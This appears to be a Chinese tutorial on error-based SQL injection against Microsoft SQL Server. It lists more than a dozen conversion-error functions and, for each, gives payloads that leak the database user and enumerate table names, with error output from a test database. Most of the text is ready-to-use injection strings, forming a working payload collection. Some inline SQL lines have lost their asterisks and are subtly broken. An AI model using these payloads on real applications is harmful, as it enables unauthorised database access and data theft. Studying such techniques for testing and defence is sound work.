0x01 前言

报错注入利用的就是类型转换时发生的错误来进行注入

所以只要能够导致类型转换错误的函数/方法都可以用来进行爆错注入

但是最重要的呢,还是服务器要会把爆错的信息返回回来才行呢~

支持进行爆错注入得函数
convert()
CAST()
db_name()
col_name()
filegroup_name()
object_name()
suser_name()
user_name()
schema_name()
type_name()
file_name()

0x02 基础数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x03 算术运算符-爆错注入

  1. 也就是利用 + - * / 来进行注入

0x03.1 查询user

SQL:select from article where id=1 and 1=1user

  1. # 查询 user
  2. 1> select * from article where id=1 and 1=1*user;
  3. 2> go
  4. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x03.2 查询表名

注意:
OVER(Order by table_name) 里面的 name 要修改为 test.dbo.sysobjects 表里面存在的一个字段
查询不同的库可以这样

例如现在有 test库 与 test2库
那么就可以这样调用
test.dbo.sysobjects
test2.dbo.sysobjects

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

注意:
XType=’U’ 表示获取某数据库的所有用户表;
XType=’S’ 表示获取某数据库的所有系统表;
例如现在查询得是 test 库得表名

SQL:select from article where id=1 and 1=1(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)

  1. # 爆表名
  2. 1> SELECT
  3. *
  4. FROM
  5. article
  6. WHERE
  7. id = 1
  8. AND 1 = 1 * (
  9. SELECT
  10. name
  11. FROM
  12. (
  13. SELECT
  14. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  15. name
  16. FROM
  17. test.dbo.sysobjects
  18. WHERE
  19. XType = 'U'
  20. ) AS a
  21. WHERE
  22. row_number = 1
  23. );
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x04 convert(int,str) 函数-爆错注入

0x04.1 查询user

SQL:select from article where id=1 and 1=1convert(int,user)

  1. 1> select * from article where id=1 and 1=convert(int,user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x04.2 查询表名

SQL:select * from article where id=1 and 1=(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1)

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. WHERE
  6. id = 1
  7. AND 1 = (
  8. SELECT
  9. name
  10. FROM
  11. (
  12. SELECT
  13. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  14. name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. XType = 'U'
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. );
  23. 2> go
  24. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x05 CAST(expressionASdata_type) 函数-爆错注入

0x05.1 查询user

SQL:select * from article where id=1 and 1=cast(user as int)

  1. 1> select * from article where id=1 and 1=cast(user as int);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x05.2 查询表名

SQL:select * from article where id=1 and 1=cast((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1) as int)

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. WHERE
  6. id = 1
  7. AND 1 = CAST (
  8. (
  9. SELECT
  10. name
  11. FROM
  12. (
  13. SELECT
  14. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  15. name
  16. FROM
  17. test.dbo.sysobjects
  18. WHERE
  19. XType = 'U'
  20. ) AS a
  21. WHERE
  22. row_number = 1
  23. ) AS INT
  24. );
  25. 2> go
  26. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x06 db_name() 函数-爆错注入

0x06.1 查询user

SQL:select * from article where id=1 and 1=db_name(user)

  1. 1> select * from article where id=1 and 1=db_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x06.2 查询表名

SQL:select * from article where id=1 and 1=db_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. WHERE
  6. id = 1
  7. AND 1 = db_name(
  8. (
  9. SELECT
  10. name
  11. FROM
  12. (
  13. SELECT
  14. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  15. name
  16. FROM
  17. test.dbo.sysobjects
  18. WHERE
  19. XType = 'U'
  20. ) AS a
  21. WHERE
  22. row_number = 1
  23. )
  24. );
  25. 2> go
  26. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x07 COL_NAME(table_id , column_id) 函数-爆错注入

0x07.1 查询user

SQL:select * from article where id=1 and 1=col_name(1,user)

  1. 1> select * from article where id=1 and 1=col_name(1,user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x07.2 查询表名

SQL:select * from article where id=1 and 1=col_name(1,(select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. WHERE
  6. id = 1
  7. AND 1 = col_name(
  8. 1,
  9. (
  10. SELECT
  11. name
  12. FROM
  13. (
  14. SELECT
  15. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  16. name
  17. FROM
  18. test.dbo.sysobjects
  19. WHERE
  20. XType = 'U'
  21. ) AS a
  22. WHERE
  23. row_number = 1
  24. )
  25. );
  26. 2> go
  27. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x08 filegroup_name() 函数-爆错注入

0x08.1 查询user

SQL:select * from article where id=1 and 1=filegroup_name(user)

  1. 1> select * from article where id=1 and 1=filegroup_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 smallint 时失败。

0x08.2 查询表名

SQL:select * from article where id=1 and 1=filegroup_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. WHERE
  6. id = 1
  7. AND 1 = filegroup_name(
  8. (
  9. SELECT
  10. name
  11. FROM
  12. (
  13. SELECT
  14. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  15. name
  16. FROM
  17. test.dbo.sysobjects
  18. WHERE
  19. XType = 'U'
  20. ) AS a
  21. WHERE
  22. row_number = 1
  23. )
  24. );
  25. 2> go
  26. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 smallint 时失败。

0x09 object_name() 函数-爆错注入

0x09.1 查询user

SQL:select from article order by idobject_name(user)

  1. 1> select * from article order by id*object_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x09.2 查询表名

SQL:select from article order by idobject_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. ORDER BY
  6. id * object_name(
  7. (
  8. SELECT
  9. name
  10. FROM
  11. (
  12. SELECT
  13. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  14. name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. XType = 'U'
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. )
  23. );
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x10 suser_name() 函数-爆错注入

0x10.1 查询user

SQL:select from article order by idsuser_name(user)

  1. 1> select * from article order by id*suser_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x10.2 查询表名

SQL:select from article order by idsuser_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. ORDER BY
  6. id * suser_name(
  7. (
  8. SELECT
  9. name
  10. FROM
  11. (
  12. SELECT
  13. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  14. name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. XType = 'U'
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. )
  23. );
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x11 user_name() 函数 -爆错注入

0x11.1 查询user

SQL:select from article order by iduser_name(user)

  1. 1> select * from article order by id*user_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x11.2 查询表名

SQL:select from article order by iduser_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. ORDER BY
  6. id * user_name(
  7. (
  8. SELECT
  9. name
  10. FROM
  11. (
  12. SELECT
  13. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  14. name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. XType = 'U'
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. )
  23. );
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x12 schema_name() 函数-爆错注入

0x12.1 查询user

SQL:select * from article order by schema_name(user);

  1. 1> select * from article order by schema_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x12.2 查询表名

SQL:select * from article order by schema_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. ORDER BY
  6. schema_name(
  7. (
  8. SELECT
  9. name
  10. FROM
  11. (
  12. SELECT
  13. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  14. name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. XType = 'U'
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. )
  23. );
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。

0x13 type_name() 函数-爆错注入

0x13.1 查询user

SQL:select * from article order by type_name(user)

  1. 1> select * from article order by type_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x13.2 查询表名

SQL:select * from article order by type_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. SELECT
  2. *
  3. FROM
  4. article
  5. ORDER BY
  6. type_name(
  7. (
  8. SELECT
  9. name
  10. FROM
  11. (
  12. SELECT
  13. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  14. name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. XType = 'U'
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. )
  23. )

0x14 file_name() 函数-爆错注入

0x14.1 查询user

SQL:select * from article order by file_name(user)

  1. 1> select * from article order by file_name(user);
  2. 2> go
  3. 22018 - [SQL Server]在将 nvarchar 'dbo' 转换成数据类型 int 时失败。

0x14.2 查询表名

SQL:select * from article order by file_name((select name from (select ROW_NUMBER() OVER(Order by name) AS row_number,name FROM test.dbo.sysobjects Where XType=’U’) as a where row_number=1))

  1. 1> SELECT
  2. *
  3. FROM
  4. article
  5. ORDER BY
  6. file_name(
  7. (
  8. SELECT
  9. name
  10. FROM
  11. (
  12. SELECT
  13. ROW_NUMBER () OVER (ORDER BY name) AS row_number,
  14. name
  15. FROM
  16. test.dbo.sysobjects
  17. WHERE
  18. XType = 'U'
  19. ) AS a
  20. WHERE
  21. row_number = 1
  22. )
  23. );
  24. 2> go
  25. 22018 - [SQL Server]在将 nvarchar 'article' 转换成数据类型 int 时失败。